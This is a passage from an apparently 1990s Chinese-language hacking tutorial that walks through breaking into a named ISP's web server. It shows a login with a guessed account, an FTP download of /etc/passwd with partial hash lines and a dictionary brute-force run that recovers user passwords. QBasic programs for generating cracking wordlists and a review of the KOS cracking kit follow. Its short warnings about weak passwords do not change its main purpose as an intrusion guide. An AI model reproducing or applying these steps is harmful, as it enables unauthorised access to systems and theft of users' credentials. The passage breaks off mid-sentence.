basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash (CoolFire 注: 因為使用 PaSs2DiC 很容易找出 ID 與 Password 相同的. 故除了 Coffee 外, 其 它我找到密碼的 EnCode Password 部份皆改過(guò)..... 除非你一個(gè)一個(gè)試啦~~~ 我沒(méi)說(shuō)喔!) www:/etc$ exit logout Connection closed by foreign host. (可以走了 !! 改用 FTP 將 /etc/passwd 給抓回來(lái)吧!) ms.hinet.net.tw> ftp www.coffee.com.tw Connected to www.coffee.com.tw. 220- 220- 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽(yù), 大家自己去看吧! 220- 220- 220- There are 0 users in FTP Server now. 220- 目前已有 0 使用者在此 Server 上. 220- If you have any suggestion, please mail to: 220- service@xx.xxxxxxx.xxx.xx. 220- 220- 220- 220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. (還是使用剛剛的賬號進(jìn)入) Name (www.coffee.com.tw:YourName): coffee 331 Password required for coffee. Password: 230 User coffee logged in. Remote system type is UNIX. Using binary mode to transfer files. (直接到達檔案放置地點(diǎn)) ftp> cd /etc 250 CWD command successful. ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. ttys fdprm group issue motd mtools profile securetty shells termcap skel csh.cshrc csh.login lilo inet default services HOSTNAME DIR_COLORS passwd passwd.OLD wtmp utmp gettydefs inittab.gettyps.sample ld.so.conf ld.so.cache at.deny fs magic rc.d syslog.conf printcap inittab sudoers vga diphosts mail.rc ppp NNTP_INEWS_DOMAIN sendmail.st NETWORKING gateways bootptab exports ftpusers host.conf hosts hosts.allow hosts.deny hosts.equiv inetd.conf named.boot networks nntpserver protocols resolv.conf rpc ftpaccess hosts.lpd ftpconversions snooptab msgs ftpgroups slip.login slip.hosts yp.conf.example X11 lilo.conf sendmail.cf fstab fastboot mtab syslog.pid klogd.pid shutdownpid localtime passwd.old ioctl.save psdevtab ftp.banner ftp.deny issue.net motd.bak securetty.old 226 Transfer complete. (取回該檔案) ftp> get passwd 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (4081 bytes). 226 Transfer complete. 4081 bytes received in 2.5 seconds (1.6 Kbytes/s) (盡速離開(kāi)) ftp> bye 221 Goodbye. 好了! 有了 /etc/passwd 之後一切都好辦了, 趕緊將你的寶貝收藏 PaSs2DiC 拿出來(lái)吧 !! 快點(diǎn)跑一下, 讓它自動(dòng)產(chǎn)生字典檔案: C:\hack>pass2dic PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN. This tool will: [1] Load PASSWD file and convert it to only username text file [2] Write the file to a dictionary file you choise for target Your Source PASSWD File Name: passwd Your Target Dictionary Name: dic.cfe PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw FETAG Software Development Co: http://www.showtower.com.tw/~fetag C:\hack> (這樣就好了 ! 自動(dòng)產(chǎn)生的檔案會(huì )放在 dic.cfe 這個(gè)檔案中, 咱們跑一下 Brute Force 看看!) C:\hack>fbrute passwd @dic.cfe BRUTE!, Unix Brute Force Hacking Routine. v2.0 Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot. 闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡 Attempts/Hits: 5184/9 Taking list input from dic.cfe Beginning search of passwd for password: xxx Match for password xxxxxx found! Username: xxxxxx Match for password xxxxx found! Username: xxxxx Match for password xxx found! Username: xxx Match for password xxxxxx found! Username: xxxxxx Match for password xxxxxx found! Username: xxxxxx Match for password coffee found! Username: coffee Match for password xxxxxxx found! Username: xxxxxxx Match for password xxx found! Username: xxx Match for password xxxx found! Username: xxxx Done. C:\hack> 看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實(shí)在是....@#$%^...&* 因某些關(guān)系 所以其它部份要被 "馬賽克" 起來(lái), 請各位讀者見(jiàn)量! **** 再談密碼 **** 看了以上的破解示范, 就可以了解到許多人還是對於 "密碼" 這東西不是很有 "密碼" 的觀(guān)念, 人就是 那麼的懶, 隨便設定一個(gè)好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用 QBasic 來(lái)設計 一個(gè)自動(dòng)產(chǎn)生密碼的小程式, 相信對許多人有很大的幫助, 底下我們再來(lái)淺顯的介紹一下字母密碼的 產(chǎn)生方法, 相信對於你在 Hack 某站會(huì )有更大的幫助. 事情的開(kāi)始是有一位網(wǎng)友 mail 給我, 問(wèn)我字典檔要如何寫(xiě)程式來(lái) "自動(dòng)擴大", 而讓我有了寫(xiě)這一段的 想法, 現在我就針對這位網(wǎng)友的問(wèn)題作一個(gè)更詳細的說(shuō)明 (因已簡(jiǎn)短回信答覆), 并且寫(xiě)出來(lái)讓大家了 解一下, 當然我們的示范還是使用 QBasic, 因為這是最容易找到的程式了, 而且語(yǔ)法大家也可能會(huì )比較 熟悉一點(diǎn), 如果我使用 VB 或 C 來(lái)寫(xiě), 可能有些人只會(huì )拿去用, 而不會(huì )去修改或者寫(xiě)個(gè)好一點(diǎn)的出來(lái)! 先說(shuō)明一下原理好了: 我們所要作的程式是一個(gè)自動(dòng)產(chǎn)生字典檔的程式, 所以我們要了解字的字母排 列到底有哪些方法可循?? 我們先舉幾個(gè)簡(jiǎn)單的單字出來(lái)比較看看: [1] apple [2] guest [3] james [4] superman [5] password OK! 來(lái)看看! 如果你有一點(diǎn)英文的概念的話(huà)應該會(huì )知道母音及子音吧 ! 我們首先這樣說(shuō)明: 母音在英文 上有 : A E I O U 這五個(gè), 所有的英文單字都會(huì )有這些母音 (有些沒(méi)有的可能是專(zhuān)有名詞或縮寫(xiě)), 也有可 能是雙母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等, 再來(lái)就是比較每個(gè)字的開(kāi)頭, 有可能是母音, 也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student 是兩個(gè)子音再接一個(gè)母 音字母, 所以接下來(lái)依照常用字將這些子音找出來(lái), 我想了一下大概有: br, bl, cl, dg, dr, fl, gr, kn, ph, st, sp, wh .... 等幾種(其它請自行統計), 然後是結尾部份, 通常結尾部分有下列幾種: e; est; ord; ard; ls; es; s... 等好多好多, 我們稍為思考一下就知道要如何寫(xiě)出這樣的程式出來(lái)了 !! 我大略寫(xiě)一個(gè)簡(jiǎn)單的, 其它大家 自行發(fā)揮, 如果有人學(xué)語(yǔ)言學(xué)的, 請幫忙弄一份常用組合表出來(lái), 可能會(huì )更有幫助吧 !! 底下就是該程式片段, 執行後會(huì )產(chǎn)生 MyDic.Txt 檔, 大小為: 22,096 Bytes 共有 3120 個(gè)字的字典!! --------------- MakeDic.BAS Start Here-------------- DIM FirstWord$(20) DIM MotherWord$(13) DIM LastWord$(12) DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s", "t", "p", "k" , "f", "m", "n", "b","k" DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo" DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s" FOR I = 1 TO 20 READ FirstWord$(I) PRINT FirstWord$(I) NEXT I FOR I = 1 TO 13 READ MotherWord$(I) NEXT I FOR I = 1 TO 12 READ LastWord$(I) NEXT I OPEN "MyDic.txt" FOR OUTPUT AS #1 FOR I = 1 TO 20 FOR J = 1 TO 13 FOR K = 1 TO 12 PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K) NEXT K NEXT J NEXT I CLOSE : END --------------- Cut Here, End of MakeDic.BAS-------------------- 當然這只是小部份的組合, 相信你可以作出一個(gè)更大的字典檔出來(lái), 如: 子音+母音+子音+母音+子音, 作 出來(lái)的字典檔會(huì )很?chē)樔肃?!! 這一個(gè)部份就講到這里了 ! 如果你有很棒的字典產(chǎn)生程式, 寫(xiě)好了請 Mail 一 份給我喔 !! 如果可以的話(huà)請說(shuō)明是否可以公布在我的 W3 上讓其它人下載 !! 還是你只是要給我 ?! 希望每次講到密碼的問(wèn)題後, 大家可以將這些密碼的產(chǎn)生方法與自己的密碼對照看看, 如果有相同的請 趕緊將自己的密碼換掉, 我講得口沫橫飛, 都沒(méi)有人要聽(tīng)嗎 ??? 咖啡業(yè)者...... ISP 們.... 教教你們的使用者 吧..... 唉~~~~ **** 後語(yǔ) **** 我們的首頁(yè)感謝大家的支持, 現在人數已經(jīng)到達 2,000 了, 這是一個(gè)地下站 (未對外正式公布) 很棒的一個(gè) 數字, 在與其它工作室人員研究之後, 暫時(shí)不對外公布站址, 如果你是 "誤闖" 到本站來(lái)的! 我們歡迎你的 加入, 但目前尚不考慮對外公布站址, 請您在告訴你的朋友有這麼一個(gè)站存在的時(shí)候, 請他不要隨便告訴 別人 (請只告訴你信賴(lài)的朋友; 或對電腦有一份特別狂熱的人, 我們都歡迎他們的加入), 我們目前所采用 的方式將是開(kāi)放式的! 對首頁(yè)部份暫時(shí)不以密碼方式處理. ** 不要 Crack 這個(gè)首頁(yè)的 ISP!!!! 否則 FETAG Sofeware‘s Hacking Page 將會(huì )完全關(guān)閉, 再也不尋找其它的地 方來(lái)放置, 希望給你的是使用電腦的 "知識", 不要利用它來(lái)奪取任何的 "權利", 本首頁(yè)著(zhù)重的是教育, 而 不是一 的教導攻擊的方法, 希望大家對於政府機關(guān) (org.tw) 或教育機構 (edu.tw) 不要作任何的破壞!! 還有我的 ISP......:D **** 課程開(kāi)始 **** 依我看, "字典" 這個(gè)討論應該是談不完的了, 因為有太多的方法了, 但是為了維護你自身的權益, 自己的密碼最好保管好, 我在前幾天剛拿到 KOS 的時(shí)候, 拿她來(lái)跑一個(gè) ISP 的/etc/passwd 檔案, 原先單單使用 Crack Jack 只找到 22 組的密碼, 用了 KOS 加上 Crack Jack 居然共找到了88 組的密碼, 還好該 ISP 不像 高-NET 一樣是屬於 "時(shí)數收費" 的收費方式, 不然可能有許多的User 自己當了冤大頭都還渾然不知. 所以這個(gè)討論還是免不了的, 如果你覺(jué)得你不需要這些知識,請跳過(guò)去吧!! 上次的字典檔討論, 我寫(xiě)了一個(gè)簡(jiǎn)短的程式出來(lái)產(chǎn)生了 3120 組的密碼,但是這些密碼并不一定是一個(gè) "字", 也就是說(shuō)產(chǎn)生完全合乎我們所限定的 "法則", 但卻不一定是一個(gè)已存在的字,所以如果要產(chǎn)生一個(gè) "高效率" 的字典檔, 使用上次所說(shuō)的那種方式就不是一個(gè)很好的方法了.以上次所寫(xiě)的程式 MAKEDIC.BAS 所產(chǎn)生的 MyDic.txt 為例, 其中的 braard clale cleoe dgeiingdgeie.......等字就不是很 "正常" 的字, 當然也有可能是某人的密碼, 但其機率小之又小. 這次所寫(xiě)的程式名稱(chēng)為 TXT2DIC.BAS, 我們還是先使用大家都熟悉的 QBASIC 來(lái)寫(xiě), 以方便日後的修改, 先說(shuō)明一下原理: 這個(gè)程式是一個(gè)自動(dòng)產(chǎn)生字典檔的程式, 我們是經(jīng)由給程式一個(gè)"文字檔", 然後由程式自該文字檔中 "抽取出" 字出來(lái), 這些文字檔必需是英文的文字檔,如果使用中文的文字檔的話(huà)程式跑起來(lái)會(huì )有問(wèn)題, 英文文字檔的取得可由英文版軟體的 Readme檔或網(wǎng)路上的英文版學(xué)術(shù)論文或其它的來(lái)源. 當然有可能在文件中會(huì )出現像 www.showtower.com.tw/~fetag 的字眼,我們總不能把它也列入字典檔中吧! 所以程式中有一點(diǎn)小小的設計, 就是該字若字母數大於 10 則不列入考慮,我們也可以使用上一次所介紹的子音+母音... 等的公式來(lái)作檢查法, 但是我沒(méi)有太多的時(shí)間作這些事,留待有空的人來(lái)寫(xiě)吧!! 底下就是該程式原始碼, 請各位以 QBASIC 來(lái)啟動(dòng)并執行它: --------------- Txt2Dic.BAS Start Here-------------------- CLS PRINT "Txt2Dic Version 0.1B (C)1997 By CoolFire ReChange: CoolFire" PRINT "[Source Released, For Changer, Add Your Name in ReChange Field]" LINE INPUT "Text File Name: "; TxtFile$ LINE INPUT "Output Dic Name: "; DicFile$ OPEN TxtFile$ FOR INPUT AS #1 OPEN "TMPFILE1.$$$" FOR OUTPUT AS #2 REM Filter for text file ReInput: IF EOF(1) THEN GOTO EndFile LINE INPUT #1, L$ ReTry: L$ = LTRIM$(L$) L$ = RTRIM$(L$) TmpValue = INSTR(L$, " ") IF TmpValue <> 0 THEN DicTxt$ = LEFT$(L$, TmpValue - 1) PRINT #2, DicTxt$ LOCATE 7, 1: PRINT "Step 1, Add word : "; DicTxt$; STRING$(10, " ") L$ = RIGHT$(L$, LEN(L$) - TmpValue) GOTO ReTry ELSE GOTO ReInput END IF END EndFile: CLOSE REM Filter for special chapter and lower-case the word OPEN "TMPFILE1.$$$" FOR INPUT AS #1 OPEN DicFile$ FOR OUTPUT AS #2 Special$ = "-,.:<>?*()/_" + CHR$(34) DO LINE INPUT #1, L$ FOR I = 1 TO 13 SP$ = MID$(Special$, I, 1) TmpValue = INSTR(L$, SP$) IF TmpValue <> 0 THEN LOCATE 8, 1: PRINT "Remode special word :"; L$; STRING$(10, " ") L$ = "" END IF NEXT I IF L$ <> "" THEN L$ = LCASE$(L$) PRINT #2, L$ END IF LOOP UNTIL EOF(1) CLOSE KILL "TMPFILE1.$$$" END --------------- Cut Here, End of Txt2Dic.BAS--------------------- 我只花了幾分鐘寫(xiě)這個(gè)程式, 因為時(shí)間緊迫 (為了在過(guò)年前將此篇送出),所以有些考慮到的地方都沒(méi)有作修改, 在這里再作些說(shuō)明: 這個(gè)程式的第一個(gè)部份為分解字串, 將碰到的 CHR$(20)也就是空白分離出來(lái), 這是分解一句話(huà)中字與字最簡(jiǎn)單的方法,并且會(huì )將分解出來(lái)的字存在一個(gè)暫存檔中, 作為第二部分的使用. 第二部分將暫存檔讀入, 并過(guò)濾非正常的字母出現,我只讓它過(guò)濾了十三種特殊字如: -,.:<>?*()/_" 等, 當然如果你可視需要再作刪減的功能. 原本想要再寫(xiě)排序及過(guò)濾重覆字的功能, 但是這些功能不是那麼需要,因為在排序方面你可以使用電腦中 DOS 的 SORT 或 Crack Jack 的 JSort, 過(guò)濾重覆字也有 CoolFire 的 De-Sort可以使用, 所以就先在這里停住, 有心的讀者可以自行修改, 修改完後也請傳送一份給我,作為日後教學(xué)的參考之用, 或提供網(wǎng)友們分享. 仔細看一看這個(gè)程式還是有很多地方?jīng)]有作修正, 或是沒(méi)有作 Error Handle 等,但已經(jīng)給各位原始程式了, 大家就試著(zhù)修改看看吧! Qbaisc 是一個(gè)很簡(jiǎn)單的語(yǔ)言,只要你試試看就可以把這個(gè)程式改得很好了. 用這個(gè)程式試了一個(gè)文字檔, 發(fā)現它找到的字都是一些很簡(jiǎn)單的字,當然跟你所給它的材料有很大的關(guān)系, 使用這個(gè)程式配合一個(gè)很棒的材料檔, 應該可以作出一份很棒的字典檔,希望大家可以好好的利用它. -*-*-*-*-*-*-*-*-*-**-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- **** 新工具程式 Global KOS Krack (KOS) **** 記得從上次講過(guò) Crack Jack 之後好像就沒(méi)有再講過(guò) Password Crack 的工具程式了, 當然也跟最近沒(méi)有甚麼好程式出現有關(guān)系, 像前一陣子風(fēng)行的 Mail Bomb 最近也沒(méi)有再見(jiàn)到改版,倒是出現了一些寫(xiě)得不怎麼樣的 Bomb 程式, 了無(wú)新意, 我現在還是在用 KaBoom 3.0, 前幾天無(wú)聊逛了一下國外的 Crack 站臺, 意外的發(fā)現了一個(gè)叫作 KOS 的東西, 傳回來(lái)試了一試果然不錯,而且里面還包含了一個(gè) 3MB 多的字典檔, 這對字典檔中缺料的讀者們肯定會(huì )有幫助的. KOS 是許多工具的集合, 由一些批次檔對這些工具作了很棒的整合, 它必須與 Crack Jack一起使用才能運作, 平常我們在處里 Password Crack 時(shí)都需要考慮到第一個(gè)字母大寫(xiě), 加數字,字母大小寫(xiě)轉換等等的工作, 都可以由 KOS 一手包辦, 你只要取得 KOS, 就可以配合著(zhù) Crack Jack將以前單單使用 Jack 尋找的 /etc/passwd % |
聯(lián)系客服